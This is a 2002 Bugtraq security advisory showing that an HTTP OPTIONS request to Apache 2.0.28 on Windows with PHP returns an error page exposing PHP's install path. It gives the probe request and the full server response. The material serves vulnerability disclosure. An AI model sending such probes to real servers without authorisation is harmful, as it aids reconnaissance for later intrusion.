Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHP Advisory #2
From: "Paul Brereton" <brereton_paul () btopenworld com>
Date: Thu, 7 Feb 2002 12:03:00 -0000

Title : PHP Reveals True Path (OPTIONS)
Author : Paul Brereton
E-Mail : brereton_paul () btopenworld com

Summary : When a web administrator installs Apache with PHP and adds
index.php to the Apache configuration file, Apache first looks for index.php
when sending back the default web page for this directory. This opens up a
security weakness that allows remote attackers to gain sensitive information
about the directory structure of the Apache and PHP installation.

Details :Sending an OPTIONS request to the web server reveals the
installation path of PHP.

Example:
The OPTIONS output is show here:

OPTIONS / HTTP/1.1
Host: 192.168.1.2
Accept: */*

< HTTP/1.1 500 Internal Server Error
< Date: Sun, 03 Feb 2002 10:56:53 GMT
< Server: Apache/2.0.28 (Win32)
< Vary: accept-language
< Accept-Ranges: bytes
< Content-Length: 680
< Connection: close
< Content-Type: text/html; charset=ISO-8859-1

< <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
< <HTML>
< <HEAD>
< <TITLE>Server error!</TITLE>
< <LINK REV="made" HREF="mailto:admin () 192 168 1 2">
< </HEAD>
<
< <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000CC">
< <H1>Server error!</H1>
< <DL>
< <DD>
<
<
<
< handler "cgi-script" not found for: C:/php/php.exe
<
<
< </DL><DL><DD>
<If you think this is a server error, please contact
<the <A HREF="mailto:admin () 192 168 1 2">Webmaster</A>
<
< </DL>
<
< <H2>Error 500</H2>
< <DL>
< <DD>
< <ADDRESS>
< <A HREF="/">192.168.1.2</A>
< <BR>
<
< <small>02/03/02 10:56:53</small>
< <BR>
< <small>Apache/2.0.28 (Win32)</small>
< </ADDRESS>
< </DL>
< </BODY>
< </HTML>
<

As you can see the line " handler "cgi-script" not found for: C:/php/php.exe
" reveals the install path of PHP.


  By Date           By Thread  

Current thread:
  • PHP Advisory #2 Paul Brereton (Feb 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault